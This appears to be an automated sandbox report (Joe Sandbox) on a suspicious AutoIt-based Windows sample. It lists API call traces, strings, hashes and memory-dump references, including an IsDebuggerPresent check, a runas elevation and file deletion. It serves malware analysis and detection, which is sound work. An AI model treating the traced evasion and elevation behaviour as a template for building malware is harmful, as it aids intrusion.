Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3509786178-2769509956
Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E

Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

Analysis Process: Preceding.comPID: 3792, Parent PID: 4148COMMON

Execution Graph

Execution Coverage:	3.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.4%
Total number of Nodes:	2000
Total number of Limit Nodes:	61

Executed Functions

Function 00285FC8 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 236
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00285FF7

Part of subcall function 00288577: _wcslen.LIBCMT ref: 0028858A

GetCurrentProcess.KERNEL32(?,0031DC2C,00000000,?,?), ref: 00286123
IsWow64Process.KERNEL32(00000000,?,?), ref: 0028612A
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00286155
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00286167
GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00286175
FreeLibrary.KERNEL32(00000000,?,?), ref: 0028617C
GetSystemInfo.KERNEL32(?,?,?), ref: 002861A1

Strings

GetNativeSystemInfo, xrefs: 00286161
kernel32.dll, xrefs: 00286150
|O, xrefs: 002C50F7

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: cba7a974902e286fb4ec1dbdb5d3e8654642ae4ddb21b6d65ca2580a3d35a3df
Instruction ID: 47df9bf3895863670502b513d9f33e50ce0ab319c88d9ee13656b77d200333a2
Opcode Fuzzy Hash: cba7a974902e286fb4ec1dbdb5d3e8654642ae4ddb21b6d65ca2580a3d35a3df
Instruction Fuzzy Hash: DAA1B12EA2A3D0CFC713DB687C496973F9C6B27342F08589DE485A3272C26D4598CB25

Function 0028338B Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 148
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00283368,?), ref: 002833BB
IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00283368,?), ref: 002833CE
GetFullPathNameW.KERNEL32(00007FFF,?,?,00352418,00352400,?,?,?,?,?,?,00283368,?), ref: 0028343A

Part of subcall function 00288577: _wcslen.LIBCMT ref: 0028858A

Part of subcall function 0028425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00283462,00352418,?,?,?,?,?,?,?,00283368,?), ref: 002842A0

SetCurrentDirectoryW.KERNEL32(?,00000001,00352418,?,?,?,?,?,?,?,00283368,?), ref: 002834BB
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse user this program.,AutoIt,00000010), ref: 002C3CB0
SetCurrentDirectoryW.KERNEL32(?,00352418,?,?,?,?,?,?,?,00283368,?), ref: 002C3CF1
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,003431F4,00352418,?,?,?,?,?,?,?,00283368), ref: 002C3D7A
ShellExecuteW.SHELL32(00000000,?,?), ref: 002C3D81

Part of subcall function 002834D3: GetSysColorBrush.USER32(0000000F), ref: 002834DE
Part of subcall function 002834D3: LoadCursorW.USER32(00000000,00007F00), ref: 002834ED
Part of subcall function 002834D3: LoadIconW.USER32(00000063), ref: 00283503
Part of subcall function 002834D3: LoadIconW.USER32(000000A4), ref: 00283515
Part of subcall function 002834D3: LoadIconW.USER32(000000A2), ref: 00283527
Part of subcall function 002834D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0028353F
Part of subcall function 002834D3: RegisterClassExW.USER32(?), ref: 00283590

Part of subcall function 002835B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002835E1
Part of subcall function 002835B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00283602
Part of subcall function 002835B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00283368,?), ref: 00283616
Part of subcall function 002835B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00283368,?), ref: 0028361F

Part of subcall function 0028396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00283A3C

Strings

0$5, xrefs: 00283495
AutoIt, xrefs: 002C3CA5
It is a violation of the AutoIt EULA to attempt to reverse user this program., xrefs: 002C3CAA
runas, xrefs: 002C3D75

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
String ID: 0$5$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse user this program.$runas
API String ID: 683915450-2850983834
Opcode ID: 8651ccf94662c9b962ffc052d952bc372568ed5c68104a378b824a27c3fb0e0a
Instruction ID: 111349444be088aa2ebc08708dc228103111ad57f5bc9612709d061ecc705836
Opcode Fuzzy Hash: 8651ccf94662c9b962ffc052d952bc372568ed5c68104a378b824a27c3fb0e0a
Instruction Fuzzy Hash: 14510778119341AAC703FF60DC05DAF7BAC9F96745F00492CF482561F2DB649A69CB62

Function 002EDC54 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00285851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002855D1,?,?,002C4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00285871

Part of subcall function 002EEAB0: GetFileAttributesW.KERNEL32(?,002ED840), ref: 002EEAB1

FindFirstFileW.KERNEL32(?,?), ref: 002EDCCB
DeleteFileW.KERNEL32(?,?,?,?), ref: 002EDD1B
FindNextFileW.KERNELBASE(00000000,00000010), ref: 002EDD2C
FindClose.KERNEL32(00000000), ref: 002EDD43
FindClose.KERNEL32(00000000), ref: 002EDD4C

Strings

\*.*, xrefs: 002EDC9D

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 4819b2081b040637abaae7c0071cba820069204294f8171bc7e83763c619070c
Instruction ID: 098b5b5caf1d8d21e3d9ada99c315e9cd700c0fe6dbf1d0d6558568d2f1227cd
Opcode Fuzzy Hash: 4819b2081b040637abaae7c0071cba820069204294f8171bc7e83763c619070c
Instruction Fuzzy Hash: 12315C35069385ABC201FF20DC859EFB7E8AE96304F804D1DF4E592191EB20DA19CB66

Function 002EDD87 Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 002EDDAC
Process32FirstW.KERNEL32(00000000,?), ref: 002EDDBA
Process32NextW.KERNEL32(00000000,?), ref: 002EDDDA
CloseHandle.KERNEL32(00000000), ref: 002EDE87

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: e9d24c2a7f7626c4662fee59862e1c9922c352493da6875f7838ad538bae0a56
Instruction ID: a469486490f4abe16b05db344317b0494e780198f2451b123c6b7133aee06d78
Opcode Fuzzy Hash: e9d24c2a7f7626c4662fee59862e1c9922c352493da6875f7838ad538bae0a56
Instruction Fuzzy Hash: 6331B175018341AFD301EF60CC85AAFBBE8AF99340F44092DF581871A2EB71D959CF92

Function 0029FFE0 Relevance: 3.1, APIs: 2, Instructions: 94nativeCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 002A007D
NtProtectVirtualMemory.NTDLL ref: 002A008F

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: CloseHandleMemoryProtectVirtual
String ID:
API String ID: 2407445808-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 78b753f46bd31fc62f5408c47d26f653a634c539d56ab3e5b42eb07bd340dcfb
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 1331B571A10106DFD718DF58D4D0A69FBA6FB5A300B2486A5E409CB652DB72EDE1CBC0

Function 0029AC3E Relevance: 37.4, APIs: 1, Strings: 20, Instructions: 671
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d10m0, xrefs: 0029ACF0
t1, xrefs: 0029ADCC
41, xrefs: 0029AD45
@1, xrefs: 0029ADED
(5, xrefs: 0029AD65
1, xrefs: 0029AD74
(5, xrefs: 0029ADC1
e#5, xrefs: 0029AFA9
`1, xrefs: 0029ADE2
d1r0,2, xrefs: 0029ACA9
(5, xrefs: 0029AD4D
d1b, xrefs: 0029AD55, 0029AE8E
d5m0, xrefs: 0029AE75
t1, xrefs: 0029AD35
`*5, xrefs: 0029AFF9
i, xrefs: 0029B0A3
1, xrefs: 0029AD8A
(5, xrefs: 0029ADD7
P1, xrefs: 0029AD3D
d0b, xrefs: 0029AC96, 0029AD10, 0029AEA7

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID:
String ID: 41$@1$P1$`*5$`1$d0b$d10m0$d1b$d1r0,2$d5m0$e#5$i$t1$t1$(5$(5$(5$(5$1$1
API String ID: 0-4069520942
Opcode ID: 2039bad79853e64639695d938015ff5735014ea1527d742a4407990efb52fc3d
Instruction ID: bb9fc68e2ce29b508f2173196cfd8f43b01e43aeb499119538c4f7379ea3f44a
Opcode Fuzzy Hash: 2039bad79853e64639695d938015ff5735014ea1527d742a4407990efb52fc3d
Instruction Fuzzy Hash: 5F626A78528341CFC729DF14D195AAABBE0FF89304F10895EE8898B361DB71D955CF82

Function 00283624 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00283657
RegisterClassExW.USER32(00000030), ref: 00283681
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00283692
InitCommonControlsEx.COMCTL32(?), ref: 002836AF
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002836BF
LoadIconW.USER32(000000A9), ref: 002836D5
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002836E4

Strings

+, xrefs: 00283640
0+m"(, xrefs: 0028366C
TaskbarCreated, xrefs: 00283687
AutoIt v3 GUI, xrefs: 00283673
0, xrefs: 00283639

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$0+m"($AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-3596573769
Opcode ID: 982947fb47e514404c471932c22c1ac417123f965c31de2321ec05aca4d1283a
Instruction ID: 5715008f8bc3c7ef0309c476e6c810a8ddd7ea9c653ec93c114fc525c4a711d5
Opcode Fuzzy Hash: 982947fb47e514404c471932c22c1ac417123f965c31de2321ec05aca4d1283a
Instruction Fuzzy Hash: 5C21C3B5D01318AFDB02DFA4E889ADEBBB8FB0E711F00811AF911A62A0D7B545548F90

Function 0028370F Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00283709,?,?), ref: 00283777
KillTimer.USER32(?,00000001,?,?,?,?,?,00283709,?,?), ref: 002837A3
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 002837C6
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00283709,?,?), ref: 002837D1
CreatePopupMenu.USER32 ref: 002837E5
PostQuitMessage.USER32(00000000), ref: 00283806

Strings

0$5, xrefs: 002C3DF7
TaskbarCreated, xrefs: 002837CC
0$5, xrefs: 002C3DA9

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: 0$5$0$5$TaskbarCreated
API String ID: 129472671-3907693035
Opcode ID: aea54fffa2a6b525c35f6ca4a1704e0f80d44212b68bef828966d357d86b3e90
Instruction ID: 6ec98130b991a951b971d53a4d48c8dd7ed2365f4eaea2f998b5f9f30df216e3
Opcode Fuzzy Hash: aea54fffa2a6b525c35f6ca4a1704e0f80d44212b68bef828966d357d86b3e90
Instruction Fuzzy Hash: 68410BFC132245BBDB16FF28DC49BBA7B69E706B01F004225F901952E1DAB4DB748761

Function 002C09DB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 002C071A: CreateFileW.KERNEL32(00000000,00000000,?,002C0A84,?,?,00000000,?,002C0A84,00000000,0000000C), ref: 002C0737

GetLastError.KERNEL32 ref: 002C0AEF
__dosmaperr.LIBCMT ref: 002C0AF6
GetFileType.KERNEL32(00000000), ref: 002C0B02
GetLastError.KERNEL32 ref: 002C0B0C
__dosmaperr.LIBCMT ref: 002C0B15
CloseHandle.KERNEL32(00000000), ref: 002C0B35
CloseHandle.KERNEL32(?), ref: 002C0C7F
GetLastError.KERNEL32 ref: 002C0CB1
__dosmaperr.LIBCMT ref: 002C0CB8

Strings

H, xrefs: 002C0C3D

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 2795bc950d088ae4e8729c772a1a01aebd4d34c105490be3be73dfec8c63c8a2
Instruction ID: 39a7fa73d97efc706f0a41b0d11471c71df17cb902d1662992ca68ee36e0b294
Opcode Fuzzy Hash: 2795bc950d088ae4e8729c772a1a01aebd4d34c105490be3be73dfec8c63c8a2
Instruction Fuzzy Hash: 97A12632A24219CFDF19EF68DC91BAD7BA4AB06324F14025DF811DB2A1DB359D22CB51

Function 002852A7 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00285594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,002C4B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 002855B2

Part of subcall function 00285238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0028525A

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 002853C4
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 002C4BFD
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 002C4C3E
RegCloseKey.ADVAPI32(?), ref: 002C4C80
_wcslen.LIBCMT ref: 002C4CE7
_wcslen.LIBCMT ref: 002C4CF6

Strings

Software\AutoIt v3\AutoIt, xrefs: 002853BA
\Include\, xrefs: 00285381
Include, xrefs: 002C4BF4, 002C4C35
\, xrefs: 002C4CFC

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: a6fe1c4c9dc96df886d6a85e86026e27f05afc16d002e16f37ea69d9b4cfb444
Instruction ID: 73bc8b327de7d7ec475749d88047c57f481b6217df214c8901d4bc4eb6d45c64
Opcode Fuzzy Hash: a6fe1c4c9dc96df886d6a85e86026e27f05afc16d002e16f37ea69d9b4cfb444
Instruction Fuzzy Hash: 5271AC75526301ABC306EF65E8859ABBBECFF99380F80442EF441871B0DB719A58CF91

Function 002834D3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 002834DE
LoadCursorW.USER32(00000000,00007F00), ref: 002834ED
LoadIconW.USER32(00000063), ref: 00283503
LoadIconW.USER32(000000A4), ref: 00283515
LoadIconW.USER32(000000A2), ref: 00283527
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0028353F
RegisterClassExW.USER32(?), ref: 00283590

Part of subcall function 00283624: GetSysColorBrush.USER32(0000000F), ref: 00283657
Part of subcall function 00283624: RegisterClassExW.USER32(00000030), ref: 00283681
Part of subcall function 00283624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00283692
Part of subcall function 00283624: InitCommonControlsEx.COMCTL32(?), ref: 002836AF
Part of subcall function 00283624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002836BF
Part of subcall function 00283624: LoadIconW.USER32(000000A9), ref: 002836D5
Part of subcall function 00283624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002836E4

Strings

AutoIt v3, xrefs: 0028357F
0, xrefs: 0028355F
#, xrefs: 00283566

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: db11057adeff7757cac5c8e8d46ee233330364c5f2631890f91a3f9f8c25a58d
Instruction ID: 473b54789dae50bf7647a473455e397d6122f32c0ebd23a0e87d0c92903e751b
Opcode Fuzzy Hash: db11057adeff7757cac5c8e8d46ee233330364c5f2631890f91a3f9f8c25a58d
Instruction Fuzzy Hash: 7B214F78E00314AFDB129FA5EC45A9A7FBCFB0EB51F00401AF604A62B0D3B90544CF94

Function 00300FB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000101,?), ref: 00301019
inet_addr.WSOCK32(?), ref: 00301079
gethostbyname.WS2_32(?), ref: 00301085
IcmpCreateFile.IPHLPAPI ref: 00301093
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00301123
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00301142
IcmpCloseHandle.IPHLPAPI(?), ref: 00301216
WSACleanup.WSOCK32 ref: 0030121C

Strings

Ping, xrefs: 003010D3

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 48abc45b03ed9680a70d832403a8449360ee8ab0cd20b2e9bf48afa557169fde
Instruction ID: fb2cd6f8065c8d008f026f0b453ebf6bb1bb5f127bd5f2cef1128d3bbad5e42f
